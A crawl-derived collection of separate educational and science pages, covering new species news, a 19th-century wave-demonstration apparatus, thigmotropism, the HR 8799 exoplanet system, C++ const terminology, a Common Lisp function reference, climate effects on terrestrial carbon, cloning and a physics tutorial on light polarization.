Evolution and the Discovery of the World's Smallest Vertebrate. PLoS ONE 7(1): e29797. CITATION: Rittmeyer EN, Allison A, Gründler MC, Thompson DK, Austin CC (2012) Ecological Guild Evolution and the Discovery of the World's Smallest Vertebrate. PLoS ONE 7(1): e29797. doi:10.1371/journal.pone.0029797. Camera traps snap first ever photo of Myanmar snub-nosed monkey (01/10/2012) In 2010 researchers described a new species of primate that reportedly sneezes when it rains. Unfortunately, the new species was only known from a carcass killed by a local hunter. Now, however, remote camera traps have taken the first ever photo of the elusive, and likely very rare, Myanmar snub-nosed monkey (Rhinopithecus strykeri), known to locals as mey nwoah, or 'monkey with an upturned face'. Locals say the monkeys are easy to locate when it rains, because the rain catches on their upturned noses causing them to sneeze. Photos: scientists find new species at world's deepest undersea vent (01/10/2012) It sounds like a medieval vision of hell: in pitch darkness, amid blazing heat, rise spewing volcanic vents. But there are no demons and devils down here, instead the deep sea vent, located in the very non-hellish Caribbean sea, is home to a new species of pale shrimp. At 3.1 miles below (5 kilometers) the sea's surface, the Beebe Vent Field south of the Cayman islands, is the deepest yet discovered. Photo: Tiny lemur discovered in Madagascar forest (01/08/2012) A new species of mouse lemur has been discovered in eastern Madagascar, report researchers from Germany. The species is described in a recent issue of the journal Primates.
<urn:uuid:2aadd2f6-31fa-4e35-8a22-6b1c67d45bab>
3.484375
924
Content Listing
Science & Tech.
54.527882
| The 1860 apparatus catalogue of Edward S. Ritchie of Boston describes the apparatus at the left as "Snell's Improved Powell's Wave Instrument, for showing the Undulations of Light, in Plane, Elliptical and Circular Polarization. The frame is of mahogany, 24 inches long by 30 inches in height; twenty four white balls are supported upon slender steel rods, to which motion is communicated by an equal number of eccentrics placed upon a shaft within the frame, the balls being arranged to give two entire waves. By raising or depressing the sliding frame, which is sustained by springs, the balls may be made to move either in straight lines, ellipses or circles ...$35.00" This example is on display at the National Museum of American History of the Smithsonian Institution in Washington, D.C. |Ebenezer Strong Snell (1801-1876) was a central figure in science education in New England. He was one of the three graduates of Amherst College in its first class of 1822, having transferred from Williams. After receiving an M.A. from Amherst in 1825, he taught mathematics and physics at Amherst until his death. Snell had a considerable flair for designing and constructing apparatus; the 1852/1870 list of apparatus at Amherst that he drew up contains numerous references to apparatus he built and used. Indeed, his lecture notes are often just lists of apparatus to be used for demonstrations, and the rest of the class followed from the demonstrations of the phenomena.| | The ultimate Powell and Snell wave machine is the Universal Wave Motion Apparatus made by the L. E. Knott Apparatus Co. of Boston, priced in the 1916 catalogue at $65.00. The form of the waves that are displayed is a function of the position of the sliding frame. When it is down, as shown in the picture, turning the crank will cause the balls on the top to demonstrate transverse waves and the balls on the top show longitudinal waves. Slide the frame up and the upper balls will trace out the circular or elliptical motions characteristic of particles on the surface of a water wave. This apparatus is in regular use at the College of Wooster in Ohio.
<urn:uuid:d2cea97c-6e4f-4689-be34-f5c6eb7830db>
3.5625
472
Knowledge Article
Science & Tech.
54.085209
Thigmotropism is the growth of a plant around a support. Tropism is a phenomena by which a plant, usually climber like money plant and ivy, responds to a stimulus. Stems of the pea plant, for instance, are weak and have coil-like structures called tendrils. When tendrils approach a support (stick), a phytohormone called auxin is released in the side of the tendril away from the support. Auxin, a growth hormone, elongates the cells of that portion and makes it strong. The other portion, devoid of auxin, becomes weak and coils around the support.
<urn:uuid:4462dcf4-3f34-46ff-a13b-199b8d1b66a1>
3.125
130
Knowledge Article
Science & Tech.
54.133333
A Solar System Like Ours, Supersized The research was published Dec. 8 in the advance online version of the journal Nature. The astronomers say the planetary system resembles a supersized version of our solar system. "Besides having four giant planets, both systems also contain two 'debris belts' composed of small rocky or icy objects, along with lots of tiny dust particles," said Benjamin Zuckerman, a UCLA professor of physics and astronomy and co-author of the Nature paper. Our giant planets are Jupiter, Saturn, Uranus and Neptune, and our debris belts include the asteroid belt between the orbits of Mars and Jupiter and the Kuiper Belt, beyond Neptune's orbit. The newly discovered fourth planet (known as HR 8799e) is about 129 light years from Earth. The mass of the HR 8799 planetary system is much greater than our own. Astronomers estimate that the combined mass of the four giant planets may be 20 times greater than the mass of all the planets in our solar system, and the debris belt counterparts also contain much more mass than our own. "This is the fourth imaged planet in this planetary system, and only a tiny percentage of known exoplanets (planets outside our solar system) have been imaged; none has been imaged in multiple-planet systems other than those of HR 8799," Zuckerman said. All four planets orbiting HR 8799 are similar in size, likely between five and seven times the mass of Jupiter. The newly discovered planet orbits HR 8799 more closely than the other three. If it were in orbit around our sun, astronomers say, it would lie between the orbits of Saturn and Uranus. The astronomers used the Keck II telescope at Hawaii's W.M. Keck Observatory to obtain images of the fourth planet. Zuckerman's colleagues are from Canada's National Research Council (NRC), Lawrence Livermore National Laboratory (LLNL) in California, and Lowell Observatory in Arizona. "We reached a milestone in the search for other worlds in 2008 with the discovery of the HR 8799 planetary system," said Christian Marois, an NRC astronomer and lead author of the Nature paper. "The images of this new inner planet are the culmination of 10 years' worth of innovation, making steady progress to optimize every aspect of observation and analysis. This allows us to detect planets located ever closer to their stars and ever further from our own solar system." "The four massive planets pull on each other gravitationally," said co-author Quinn Konopacky, a postdoctoral researcher at LLNL. "We don't yet know if the system will last for billions of years or fall apart in a few million more. As astronomers carefully follow the HR 8799 planets during the coming decades, the question of the stability of their orbits could become much clearer." "There's no simple model that can form all four planets at their current location," said co-author Bruce Macintosh of LLNL. "It's going to be a challenge for our theoretical colleagues." It is entirely plausible that this planetary system contains additional planets closer to the star than these four planets, quite possibly rocky, Earth-like planets, Zuckerman said. But such interior planets are far more difficult to detect, he added. "Images like these bring the exoplanet field, which studies planets outside our solar system, into an era of exoplanet characterization," said co-author Travis Barman, a Lowell Observatory exoplanet theorist. "Astronomers can now directly examine the atmospheric properties of four giant exoplanets that are all the same young age and that formed from the same building materials." Detailed study of the properties of HR 8799e will be challenging due to the planet's relative faintness and its proximity to its star. To overcome those limitations, Macintosh is leading an effort to build an advanced exoplanet imager, called the Gemini Planet Imager, for the Gemini Observatory. This new instrument will physically block the starlight and allow quick detection and detailed characterization of planets similar to HR 8799e. UCLA and the NRC are also contributing to Gemini Planet Imager. James Larkin, a UCLA professor of physics and astronomy, is building a major component of the imager, which is scheduled to arrive at the Gemini South Telescope in Chile late next year. The research reported in Nature was funded by NASA, the U.S. Department of Energy and the National Science Foundation Center for Adaptive Optics. For more information, visit the NRC's website at www.nrc-cnrc.gc.ca.
<urn:uuid:6529d406-46eb-4a39-894f-dbf2e99a9d3c>
3.296875
944
Knowledge Article
Science & Tech.
42.635032
Simply begin typing or use the editing tools above to add to this article. Once you are finished and click submit, your modifications will be sent to our editors for review. ...a nondestructive phenomenon if the resulting power dissipation is limited to a safe value. The applied forward voltage is usually less than one volt, but the reverse critical voltage, called the breakdown voltage, can vary from less than one volt to many thousands of volts, depending on the impurity concentration of the junction and other device parameters. What made you want to look up "breakdown voltage"? Please share what surprised you most...
<urn:uuid:10639d36-0b5b-4bbe-bc53-767dac95b7d3>
2.921875
125
Knowledge Article
Science & Tech.
44.558094
The Mutable Comprehension of const constas a modifier of pointer/reference types in C and C++ can cause confusion. I don't know about you, but I get all future-shocked when trying to express or understand concepts where language is used ambiguously. Unfortunately, even after all these years, it seems that the use of const as a modifier of pointer/reference types in C and C++ can cause confusion.I've been working with some talented C++ developers recently, and have been surprised to learn that confusion over the use of the const modifier, when applied to pointers and references, still persists even among programmers of considerable experience. I think there are three reasons why this is so: language, syntax, and the C++ Standard. In my opinion, the key to surviving the ambiguity of const pointers and references is to not use the word "const" at all, and instead rely on the use of precise nomenclature about what is actually implied by its use: mutability. The problem with "const" is that it's just not specific enough. When someone says "const pointer" it's not clear whether the pointer is "const" (i.e. it must always points to the same location) or the thing it points to is const(ant) (i.e. the variable to which it points cannot be changed). This is further complicated by the fact that a variable referred to by a "const" pointer may be changed by another (non-const) alias to it elsewhere in the program. It's actually impossible and inappropriate to infer anything that a variable is const from a pointer to it. Rather than this imprecision and ambiguity, I suggest programmers should eschew phrases such as "const pointer", "non-const pointer", "pointer to const int", "pointer to non-const int", and "const pointer to const int". Prefer instead the unambiguous phrases "immutable pointer", "mutable pointer", "non-mutating pointer to int", "mutating pointer to int", and "immutable non-mutating pointer to int". A pointer may or may not be mutable (whether the pointer may be changed to point to a different location) and may or may not be mutating (whether it may be used to change the variable to which it refers). (Note: in this way, the always-confusing terminology of the "const reference" goes away. Strictly speaking, a reference is always const, because references cannot be reassigned. In the new terminology, references are immutable. Which we knew. Now we need only concern ourselves with whether a reference is mutating or non-mutating.) C and C++ are agnostic about where the const modifier can be placed in a majority of contexts. The following pairs of constructs are identical: // 1. int const int i = 10; int const j = 20; // 2. pointer-to-int const int* p = &i; int const* q = &j; // 3. reference-to-int const int& p = i; int const& q = j; I prefer the second form of each, and I strongly recommend it to C/C++ programmers, because (I believe that) it's the only way in which one can sensibly read composite types, by reading from right-to-left. Consider the following two equivalent ways of specifying a pointer: const int* const p = &i; int const* const q = &j; q are immutable non-mutating pointers to int. If we read from right-to-left, the presence/absence of const before (i.e. to the right of) the * determines whether the pointer is mutable/immutable, and the presence/absence of const after (i.e. to the left of) the * determines whether the pointer is mutating/non-mutating. By always preferring the X const form over the const X form, the const, if present, will be immediately adjacent to the *. Doing the same for non-pointer/non-reference variable declarations follows for reasons of consistency. Let's do a few more to practise: // A mutable mutating pointer to int int* p = &i; // A mutable non-mutating pointer to int int const* p = &i; // An immutable mutating pointer to int int* const p = &i; // An immutable non-mutating pointer to int int const* const p = &i; // An (immutable) mutating reference to int int& r = &i; // An (immutable) non-mutating reference to int int const& r = &i; The C++ Standard Historically, the C++ standard is not much of a friend to us in so far as precise names go, and that is also the case in this regard. There are the well known obvious ambiguities, such as the inconsistency between empty() (an interrogative: is the instance empty?) and erase() (an imperative: clear the instance contents). With member types of pointers, references, and iterators, the use of the word const as part of essential member types const_pointer, and, particularly, const_iterator, gets more confusing. It's not only possible to change a const_iterator, it's actually essential to traversing ranges. Furthermore, with some containers (such as C++0x sets), erasing elements is done via a const_iterator is not an immutable iterator, it's a non-mutating iterator: an iterator through which one may access an element in a non-mutating manner, and with which one may traverse the sequence to access, in a non-mutating manner, other elements in the container/collection. Language, Syntax, The C++ Standard: How to Survive My way to survive these issues are: - Syntax: always apply the constmodifier after the type being modified. I've been an adherent to this for pointers and references for many years, but have only recently gone the whole hog in applying it to all types of variables consistently. I'm finding it beneficial. - Language: when writing documentation or articles (or blogs, or books), I always refer to pointers/references/iterators in terms of their being mutable/immutable and mutating/non-mutating - The C++ Standard: the fat lady has sung on this one. Don't bother trying to create container types with a mutating called empty(), or with mutating_iteratormember types. There's just too much mindshare and technical momentum to buck it.
<urn:uuid:c6cbb55c-7276-4558-af63-0dcf82e78064>
2.71875
1,419
Personal Blog
Software Dev.
48.031656
ANSI Common Lisp 21 Streams 21.2 Dictionary of Streams &optional input-stream eof-error-p - Arguments and Values: input-stream -- an input stream designator. The default is standard input. eof-error-p - a generalized boolean. The default is true. eof-value - an object. The default is nil. recursive-p - a generalized boolean. The default is false. char - a character or nil or the eof-value. read-char-no-hang returns a character from input-stream if such a character is available. If no character is available, read-char-no-hang returns nil. If recursive-p is true, this call is expected to be embedded in a higher-level call to read or a similar function used by the Lisp reader. If an end of file2 occurs and eof-error-p is false, eof-value is returned. ;; This code assumes an implementation in which a newline is not ;; required to terminate input from the console. (defun test-it () ;; Implementation A, where a Newline is not required to terminate ;; interactive input on the console. (#\a NIL NIL) ;; Implementation B, where a Newline is required to terminate ;; interactive input on the console, and where that Newline remains ;; on the input stream. (#\a #\Newline NIL) - Affected By: - Exceptional Situations: If an end of file2 occurs when eof-error-p is true, an error of type end-of-file is signaled . - See Also: read-char-no-hang is exactly like read-char, except that if it would be necessary to wait in order to get a character (as from a keyboard), nil is immediately returned without waiting. - Allegro CL Implementation Details:
<urn:uuid:caaa3ae9-03f2-46f5-996d-6a611c62359c>
3.25
428
Documentation
Software Dev.
53.155849
Solar radiation, temperature and available water affect photo-synthesis, plant respiration and decomposition, thus climate change can lead to changes in NEP. A substantial part of the interannual variability in the rate of increase of CO2 is likely to reflect terrestrial biosphere responses to climate variability (Section 3.5.3). Warming may increase NPP in temperate and arctic ecosystems where it can increase the length of the seasonal and daily growing cycles, but it may decrease NPP in water-stressed ecosystems as it increases water loss. Respiratory processes are sensitive to temperature; soil and root respiration have generally been shown to increase with warming in the short term (Lloyd and Taylor, 1994; Boone et al., 1998) although evidence on longer-term impacts is conflicting (Trumbore, 2000; Giardina and Ryan, 2000; Jarvis and Linder, 2000). Changes in rainfall pattern affect plant water availability and the length of the growing season, particularly in arid and semi-arid regions. Cloud cover can be beneficial to NPP in dry areas with high solar radiation, but detrimental in areas with low solar radiation. Changing climate can also affect the distribution of plants and the incidence of disturbances such as fire (which could increase or decrease depending on warming and precipitation patterns, possibly resulting under some circumstances in rapid losses of carbon), wind, and insect and pathogen attacks, leading to changes in NBP. The global balance of these positive and negative effects of climate on NBP depends strongly on regional aspects of climate change. The climatic sensitivity of high northern latitude ecosystems (tundra and taiga) has received particular attention as a consequence of their expanse, high carbon density, and observations of disproportionate warming in these regions (Chapman and Walsh, 1993; Overpeck et al., 1997). High-latitude ecosystems contain about 25% of the total world soil carbon pool in the permafrost and the seasonally-thawed soil layer. This carbon storage may be affected by changes in temperature and water table depth. High latitude ecosystems have low NPP, in part due to short growing seasons, and slow nutrient cycling because of low rates of decomposition in waterlogged and cold soils. Remotely sensed data (Myneni et al., 1997) and phenological observations (Menzel and Fabian, 1999) independently indicate a recent trend to longer growing seasons in the boreal zone and temperate Europe. Such a trend might be expected to have increased annual NPP. A shift towards earlier and stronger spring depletion of atmospheric CO2 has also been observed at northern stations, consistent with earlier onset of growth at mid- to high northern latitudes (Manning, 1992; Keeling et al., 1996a; Randerson, 1999). However, recent flux measurements at individual high-latitude sites have generally failed to find appreciable NEP (Oechel et al., 1993; Goulden et al., 1998; Schulze et al., 1999; Oechel et al., 2000). These studies suggest that, at least in the short term, any direct effect of warming on NPP may be more than offset by an increased respiration of soil carbon caused by the effects of increased depth of soil thaw. Increased decomposition, may, however also increase nutrient mineralisation and thereby indirectly stimulate NPP (Melillo et al., 1993; Jarvis and Linder, 2000; Oechel et al., 2000). Large areas of the tropics are arid and semi-arid, and plant production is limited by water availability. There is evidence that even evergreen tropical moist forests show reduced GPP during the dry season (Malhi et al., 1998) and may become a carbon source under the hot, dry conditions of typical El Niño years. With a warmer ocean surface, and consequently generally increased precipitation, the global trend in the tropics might be expected to be towards increased NPP, but changing precipitation patterns could lead to drought, reducing NPP and increasing fire frequency in the affected regions. Other reports in this collection
<urn:uuid:5ea7bd5e-8390-4613-9355-14073c3a7f5b>
3.453125
832
Academic Writing
Science & Tech.
35.457098
Cloning is the process of producing populations of genetically-identical individuals that occurs in nature when organisms such as bacteria, insects or plants reproduce asexually. Cloning in biotechnology refers to processes used to create copies of DNA fragments (molecular cloning), cells (cell cloning), or organisms. Topics of Interest The term clone is derived from the Greek word for "trunk, branch", referring to the process whereby a new plant can be created from a twig. Molecular cloning refers to the procedure of isolating a defined DNA sequence and obtaining multiple copies of it in vivo. Cloning is frequently employed to amplify DNA fragments containing genes, but it can be used to amplify any DNA sequence such as promoters, non-coding sequences, chemically synthesised oligonucleotides and randomly fragmented DNA. Cloning is used in a wide array of biological experiments and technological applications such as large scale protein production. Somatic cell nuclear transfer (SCNT) is a laboratory technique for creating a clonial embryo, using an ovum with a donor nucleus. It can be used in embryonic stem cell research, or, potentially, in regenerative medicine where it is sometimes referred to as "therapeutic cloning." It can also be used as the first step in the process of reproductive cloning. Asexual reproduction is reproduction which does not involve meiosis, ploidy reduction, or fertilization. Only one parent is involved in asexual reproduction. A more stringent definition is agamogenesis which refers to reproduction without the fusion of gametes. Asexual reproduction is the primary form of reproduction for single-celled organisms such as the archaea, bacteria, and protists. Many plants and fungi reproduce asexually as well. While all prokaryotes reproduce asexually (without the formation and fusion of gametes), mechanisms for lateral gene transfer such as conjugation, transformation and transduction are sometimes likened to sexual reproduction. A lack of sexual reproduction is relatively rare among multicellular organisms, for reasons that are not completely understood. Current hypotheses suggest that, while asexual reproduction may have short term benefits when rapid population growth is important or in stable environments, sexual reproduction offers a net advantage by allowing more rapid generation of genetic diversity, allowing adaptation to changing environments. Dolly (5 July 1996 – 14 February 2003) was a female domestic sheep remarkable in being the first mammal to be cloned from an adult somatic cell, using the process of nuclear transfer. She was cloned by Ian Wilmut, Keith Campbell and colleagues at the Roslin Institute near Edinburgh in Scotland. She was born on 5 July 1996 and she lived until the age of six. She has been called "the world's most famous sheep" by sources including BBC News and Scientific American. Human cloning is the creation of a genetically identical copy of a human (not usually referring to monozygotic multiple births), human cell, or human tissue. The ethics of cloning is an extremely controversial issue. The term is generally used to refer to artificial human cloning; human clones in the form of identical twins are commonplace, with their cloning occurring during the natural process of reproduction. There are two commonly discussed types of human cloning: therapeutic cloning and reproductive cloning. Therapeutic cloning involves cloning cells from an adult for use in medicine and is an active area of research, while reproductive cloning would involve making cloned humans. Such reproductive cloning has not been performed and is illegal in many countries. A third type of cloning called replacement cloning is a theoretical possibility, and would be a combination of therapeutic and reproductive cloning. Replacement cloning would entail the replacement of an extensively damaged, failed, or failing body through cloning followed by whole or partial brain transplant. Ethics of cloning refers to a variety of ethical positions regarding the practice and possibilities of cloning, especially human cloning. While many of these views are religious in origin, the questions raised by cloning are faced by secular perspectives as well. As the science of cloning continues to advance, governments have dealt with ethical questions through legislation. A cloning vector is a small piece of DNA into which a foreign DNA fragment can be inserted. The insertion of the fragment into the cloning vector is carried out by treating the vehicle and the foreign DNA with the same restriction enzyme, then ligating the fragments together. There are many types of cloning vectors. Genetically engineered plasmids and bacteriophages (such as phage λ) are perhaps most commonly used for this purpose. Other types of cloning vectors include bacterial artificial chromosomes (BACs) and yeast artificial chromosomes (YACs). Pet cloning is the commercial cloning of a pet animal. The first commercially cloned pet was a cat named Little Nicky, produced in 2004 by Genetic Savings & Clone for a north Texas woman for the fee of US$50,000. On May 21, 2008 BioArts International announced a limited commercial dog cloning service through a program it calls Best Friends Again. This program came on the announcement of the successful cloning of a family dog Missy, which was widely publicized in the Missyplicity Project. In September 2009 BioArts announced the end of its dog cloning service. Source: Wikipedia (All text is available under the terms of the GNU Free Documentation License and Creative Commons Attribution-ShareAlike License.)
<urn:uuid:5719458c-1988-4b9c-ba5f-10f143f7a867>
3.984375
1,080
Knowledge Article
Science & Tech.
23.800998
CALIFORNIA sea lions may have the best memory of all non-human creatures. A female called Rio that learned a trick involving letters and numbers could still perform it 10 years later - even though she hadn't performed the trick in the intervening period. Learning concepts such as "sameness" - when one letter or number matches another, for example - is thought to require sophisticated brain processing. So scientists expect animals to have trouble retaining the ability over long periods unless they are given repeated reminders of the rules. Primates like the rhesus macaque have been found to have impressive long-term memories, but Rio trumped them all. Colleen Kastak and Ronald Schusterman, marine biologists at the University of California, Santa Cruz, began training her in 1991. They started by holding up a card with a number or letter on. Rio was then shown a card bearing the same symbol and another ... To continue reading this article, subscribe to receive access to all of newscientist.com, including 20 years of archive content.
<urn:uuid:3536240a-4f05-4d6d-a9c7-6b59d137dc1b>
3.546875
214
Truncated
Science & Tech.
47.142892
THE pull of the ocean lures people to beaches the world over, but its draw doesn't stop at the edge of the sand. At many beaches, broken waves quickly regroup into hidden torrents that sweep thousands of beach-goers straight out to sea every year. If you've ever spent time wading in the sea, you have probably felt one of these so-called "rip currents" tug at your ankles as it surges out through a calm spot in the breakers. That may seem harmless enough, but if you get caught in one while swimming the result can be deadly. The advice about escaping a rip current - sometimes wrongly called an undertow - has been doled out for decades: swim parallel to the shore. Yet rips remain a real danger. In the US alone, they contribute to about 100 drownings a year and account for about 18,000 lifeguard rescues - more than ... To continue reading this article, subscribe to receive access to all of newscientist.com, including 20 years of archive content.
<urn:uuid:88bf203e-ab88-4c2a-b76c-34bf3295ba94>
2.96875
213
Truncated
Science & Tech.
65.047812
4. METHOD OF SOLUTION The electron differential spectrum as a function of depth is inferred by assuming that electrons travel straight ahead and that distance travelled and energy are related by a range-energy relationship. The electron dose rate at a given depth is calculated by integrating, over energy and direction, the product of the electron flux, the stopping power, and the appropriate flux- to-dose rate conversion factor. The bremsstrahlung source is assumed to be plane and isotropic at a given depth. This source is defined as the integral over energy and direction of the product of photon energy, the differential bremsstrahlung spectrum from electrons of a given energy, and the electron flux differential spectrum. The differential bremsstrahlung spectrum is derived from the Born approximation cross section multiplied by a correction factor. The bremsstrahlung dose rate is obtained by integrating, over photon energy and slab volume, the product of the bremsstrahlung source, photon energy flux-to-dose rate conversion factor, buildup factor, and attenuation kernel. The buil-dup factor assumed is a plane isotropic buildup factor generate by Monte Carlo calculations. The integrations are performed by evaluating the integrand at the midpoint of each integration step, multiplying by the step width, and summing the result. The incident electron spectrum, dose rate conversion factors, and range formula coefficients are input by the user. The buildup factor information is contained in three DATA statements in subroutine BURP.
<urn:uuid:b177bc57-7ac5-4dea-8183-073921c54a64>
2.75
312
Documentation
Science & Tech.
21.59423
Search our database of handpicked sites Looking for a great physics site? We've tracked down the very best and checked them for accuracy. Just fill out the fields below and we'll do the rest. You searched for We found 13 results on physics.org and 66 results in our database of sites 65 are Websites, 1 is a Videos, and 0 are Experiments) Search results on physics.org Search results from our links database A page describing this topic and why it is so interesting. A great description of the Planck mission to study the first seconds of the universe which we can now see as the cosmic microwave background. This is a fantastic site that covers more than just physics and tracks the history of our universe right from its beginnings. It has lots of information but also movies to watch and teacher resources. Definition and links to related topics. NASA page detailing the evidence for the big bang obtained from the study of cosmic background radiation (the CMB). A blog written by a group of physicists and astrophysicists on the stuff that interests them: science but also arts, politics, culture, technology, academia, and miscellaneous trivia Catch up with the latest news, videos and info on the Planck mission, which is studying the Cosmic Microwave Background – the relic radiation from the Big Bang. See the universe in range of wavelengths from gamma rays to radio waves. Information on the electromagnetic radiation from the nucleus as a part of a radioactive process. A brief overview of how x-rays are used in medicine and forms part of teachers resources for medical physics. Showing 21 - 30 of 66
<urn:uuid:a91fa144-f7be-48a3-bafc-7c90aadf8bf1>
2.84375
342
Content Listing
Science & Tech.
53.626968
How Do We Know Light Behaves as a Wave? Looking for a lab that coordinates with this page? Try the Getting it Right with Light Lab from The Laboratory.Curriculum Corner Learning requires action. Give your students this sense-making activity from The Curriculum Corner.Fisherman Sunglasses An applet near the bottom of the page allows you to rotate the polarization axis of sunglass filters and explore the results.Liquid Crystals Deepen your understanding of the application of polarization principles to liquid crystal displays.Treasures from TPF Need ideas? Need help? Explore The Physics Front's treasure box of catalogued resources on the wave nature of light.Birefringence Includes a Java applet depicting birefringence by an Iceland Spar (calcite) crystal and a link to a hands-on lab.Molecular Expressions: Light and Color - Polarization of Light Deepen your understanding of polarization, Polarizers, Brewster's angle, and liquid crystal displays with this tutorial and accompanying simulations.Polarizer Program This interactive Java simulation from Open Source Physics (OSP) allows the user to investigate the effect of a plane polarizer on polarized light. A light wave is an electromagnetic wave that travels through the vacuum of outer space. Light waves are produced by vibrating electric charges. The nature of such electromagnetic waves is beyond the scope of The Physics Classroom Tutorial. For our purposes, it is sufficient to merely say that an electromagnetic wave is a transverse wave that has both an electric and a magnetic component. The transverse nature of an electromagnetic wave is quite different from any other type of wave that has been discussed in The Physics Classroom Tutorial. Let's suppose that we use the customary slinky to model the behavior of an electromagnetic wave. As an electromagnetic wave traveled towards you, then you would observe the vibrations of the slinky occurring in more than one plane of vibration. This is quite different than what you might notice if you were to look along a slinky and observe a slinky wave traveling towards you. Indeed, the coils of the slinky would be vibrating back and forth as the slinky approached; yet these vibrations would occur in a single plane of space. That is, the coils of the slinky might vibrate up and down or left and right. Yet regardless of their direction of vibration, they would be moving along the same linear direction as you sighted along the slinky. If a slinky wave were an electromagnetic wave, then the vibrations of the slinky would occur in multiple planes. Unlike a usual slinky wave, the electric and magnetic vibrations of an electromagnetic wave occur in numerous planes. A light wave that is vibrating in more than one plane is referred to as unpolarized light. Light emitted by the sun, by a lamp in the classroom, or by a candle flame is unpolarized light. Such light waves are created by electric charges that vibrate in a variety of directions, thus creating an electromagnetic wave that vibrates in a variety of directions. This concept of unpolarized light is rather difficult to visualize. In general, it is helpful to picture unpolarized light as a wave that has an average of half its vibrations in a horizontal plane and half of its vibrations in a vertical plane. It is possible to transform unpolarized light into polarized light. Polarized light waves are light waves in which the vibrations occur in a single plane. The process of transforming unpolarized light into polarized light is known as polarization. There are a variety of methods of polarizing light. The four methods discussed on this page are: - Polarization by Transmission - Polarization by Reflection - Polarization by Refraction - Polarization by Scattering The most common method of polarization involves the use of a Polaroid filter. Polaroid filters are made of a special material that is capable of blocking one of the two planes of vibration of an electromagnetic wave. (Remember, the notion of two planes or directions of vibration is merely a simplification that helps us to visualize the wavelike nature of the electromagnetic wave.) In this sense, a Polaroid serves as a device that filters out one-half of the vibrations upon transmission of the light through the filter. When unpolarized light is transmitted through a Polaroid filter, it emerges with one-half the intensity and with vibrations in a single plane; it emerges as polarized light. A Polaroid filter is able to polarize light because of the chemical composition of the filter material. The filter can be thought of as having long-chain molecules that are aligned within the filter in the same direction. During the fabrication of the filter, the long-chain molecules are stretched across the filter so that each molecule is (as much as possible) aligned in say the vertical direction. As unpolarized light strikes the filter, the portion of the waves vibrating in the vertical direction are absorbed by the filter. The general rule is that the electromagnetic vibrations that are in a direction parallel to the alignment of the molecules are absorbed. The alignment of these molecules gives the filter a polarization axis. This polarization axis extends across the length of the filter and only allows vibrations of the electromagnetic wave that are parallel to the axis to pass through. Any vibrations that are perpendicular to the polarization axis are blocked by the filter. Thus, a Polaroid filter with its long-chain molecules aligned horizontally will have a polarization axis aligned vertically. Such a filter will block all horizontal vibrations and allow the vertical vibrations to be transmitted (see diagram above). On the other hand, a Polaroid filter with its long-chain molecules aligned vertically will have a polarization axis aligned horizontally; this filter will block all vertical vibrations and allow the horizontal vibrations to be transmitted. Polarization of light by use of a Polaroid filter is often demonstrated in a Physics class through a variety of demonstrations. Filters are used to look through and view objects. The filter does not distort the shape or dimensions of the object; it merely serves to produce a dimmer image of the object since one-half of the light is blocked as it passed through the filter. A pair of filters is often placed back to back in order to view objects looking through two filters. By slowly rotating the second filter, an orientation can be found in which all the light from an object is blocked and the object can no longer be seen when viewed through two filters. What happened? In this demonstration, the light was polarized upon passage through the first filter; perhaps only vertical vibrations were able to pass through. These vertical vibrations were then blocked by the second filter since its polarization filter is aligned in a horizontal direction. While you are unable to see the axes on the filter, you will know when the axes are aligned perpendicular to each other because with this orientation, all light is blocked. So by use of two filters, one can completely block all of the light that is incident upon the set; this will only occur if the polarization axes are rotated such that they are perpendicular to each other. A picket-fence analogy is often used to explain how this dual-filter demonstration works. A picket fence can act as a polarizer by transforming an unpolarized wave in a rope into a wave that vibrates in a single plane. The spaces between the pickets of the fence will allow vibrations that are parallel to the spacings to pass through while blocking any vibrations that are perpendicular to the spacings. Obviously, a vertical vibration would not have the room to make it through a horizontal spacing. If two picket fences are oriented such that the pickets are both aligned vertically, then vertical vibrations will pass through both fences. On the other hand, if the pickets of the second fence are aligned horizontally, then the vertical vibrations that pass through the first fence will be blocked by the second fence. This is depicted in the diagram below. In the same manner, two Polaroid filters oriented with their polarization axes perpendicular to each other will block all the light. Now that's a pretty cool observation that could never be explained by a particle view of light. Unpolarized light can also undergo polarization by reflection off of nonmetallic surfaces. The extent to which polarization occurs is dependent upon the angle at which the light approaches the surface and upon the material that the surface is made of. Metallic surfaces reflect light with a variety of vibrational directions; such reflected light is unpolarized. However, nonmetallic surfaces such as asphalt roadways, snowfields and water reflect light such that there is a large concentration of vibrations in a plane parallel to the reflecting surface. A person viewing objects by means of light reflected off of nonmetallic surfaces will often perceive a glare if the extent of polarization is large. Fishermen are familiar with this glare since it prevents them from seeing fish that lie below the water. Light reflected off a lake is partially polarized in a direction parallel to the water's surface. Fishermen know that the use of glare-reducing sunglasses with the proper polarization axis allows for the blocking of this partially polarized light. By blocking the plane-polarized light, the glare is reduced and the fisherman can more easily see fish located under the water. Polarization can also occur by the refraction of light. Refraction occurs when a beam of light passes from one material into another material. At the surface of the two materials, the path of the beam changes its direction. The refracted beam acquires some degree of polarization. Most often, the polarization occurs in a plane perpendicular to the surface. The polarization of refracted light is often demonstrated in a Physics class using a unique crystal that serves as a double-refracting crystal. Iceland Spar, a rather rare form of the mineral calcite, refracts incident light into two different paths. The light is split into two beams upon entering the crystal. Subsequently, if an object is viewed by looking through an Iceland Spar crystal, two images will be seen. The two images are the result of the double refraction of light. Both refracted light beams are polarized - one in a direction parallel to the surface and the other in a direction perpendicular to the surface. Since these two refracted rays are polarized with a perpendicular orientation, a polarizing filter can be used to completely block one of the images. If the polarization axis of the filter is aligned perpendicular to the plane of polarized light, the light is completely blocked by the filter; meanwhile the second image is as bright as can be. And if the filter is then turned 90-degrees in either direction, the second image reappears and the first image disappears. Now that's pretty neat observation that could never be observed if light did not exhibit any wavelike behavior. Polarization also occurs when light is scattered while traveling through a medium. When light strikes the atoms of a material, it will often set the electrons of those atoms into vibration. The vibrating electrons then produce their own electromagnetic wave that is radiated outward in all directions. This newly generated wave strikes neighboring atoms, forcing their electrons into vibrations at the same original frequency. These vibrating electrons produce another electromagnetic wave that is once more radiated outward in all directions. This absorption and reemission of light waves causes the light to be scattered about the medium. (This process of scattering contributes to the blueness of our skies, a topic to be discussed later.) This scattered light is partially polarized. Polarization by scattering is observed as light passes through our atmosphere. The scattered light often produces a glare in the skies. Photographers know that this partial polarization of scattered light leads to photographs characterized by a washed-out sky. The problem can easily be corrected by the use of a Polaroid filter. As the filter is rotated, the partially polarized light is blocked and the glare is reduced. The photographic secret of capturing a vivid blue sky as the backdrop of a beautiful foreground lies in the physics of polarization and Polaroid filters. Polarization has a wealth of other applications besides their use in glare-reducing sunglasses. In industry, Polaroid filters are used to perform stress analysis tests on transparent plastics. As light passes through a plastic, each color of visible light is polarized with its own 